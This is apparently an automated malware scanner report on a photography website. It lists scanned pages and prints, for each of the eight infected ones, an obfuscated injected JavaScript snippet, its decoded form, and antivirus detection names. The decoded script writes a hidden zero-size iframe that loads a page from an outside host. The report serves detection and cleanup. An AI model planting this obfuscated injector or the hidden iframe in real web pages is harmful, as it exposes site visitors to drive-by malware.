New scan:

Malware Scanner report for leighannhoodphotography.com

Malicious/Suspicious/Total urls checked
8/0/20
8 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.leighannhoodphotography.com/
200 OK
Content-Length: 16306
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js?ver=3.9.3
200 OK
Content-Length: 93868
Content-Type: text/javascript
clean
http://www.leighannhoodphotography.com/wp-content/themes/brandom-photography/js/libs/modernizr-2.5.3.min.js?ver=1.2.4
200 OK
Content-Length: 15274
Content-Type: application/javascript
clean
http://html5shim.googlecode.com/svn/trunk/html5.js?ver=1.2.4
200 OK
Content-Length: 2429
Content-Type: text/javascript
clean
http://www.leighannhoodphotography.com/wp-content/themes/brandom-photography/js/plugins.min.js?ver=1.2.4
200 OK
Content-Length: 29082
Content-Type: application/javascript
clean
http://www.leighannhoodphotography.com/wp-content/themes/brandom-photography/js/scripts.min.js?ver=1.2.4
200 OK
Content-Length: 5124
Content-Type: application/javascript
clean
http://assets.pinterest.com/js/pinit.js
200 OK
Content-Length: 319
Content-Type: application/javascript
clean
http://www.leighannhoodphotography.com/wp-includes/js/jquery/jquery.form.min.js?ver=3.37.0
200 OK
Content-Length: 14720
Content-Type: application/javascript
clean
http://www.leighannhoodphotography.com/about-me/
200 OK
Content-Length: 17399
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 12:52:41 GMT
Location: http://www.leighannhoodphotography.com/gallery/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/
200 OK
Content-Length: 17306
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/bridal
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 12:52:43 GMT
Location: http://www.leighannhoodphotography.com/gallery/bridal/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/bridal/
200 OK
Content-Length: 16356
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/couples/
200 OK
Content-Length: 16114
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/engagement
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Thu, 18 Dec 2014 12:52:47 GMT
Pragma: no-cache
Location: http://www.leighannhoodphotography.com/gallery/engagements/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/engagements/
200 OK
Content-Length: 30788
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/families
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 12:52:49 GMT
Location: http://www.leighannhoodphotography.com/gallery/families/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/families/
200 OK
Content-Length: 34975
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
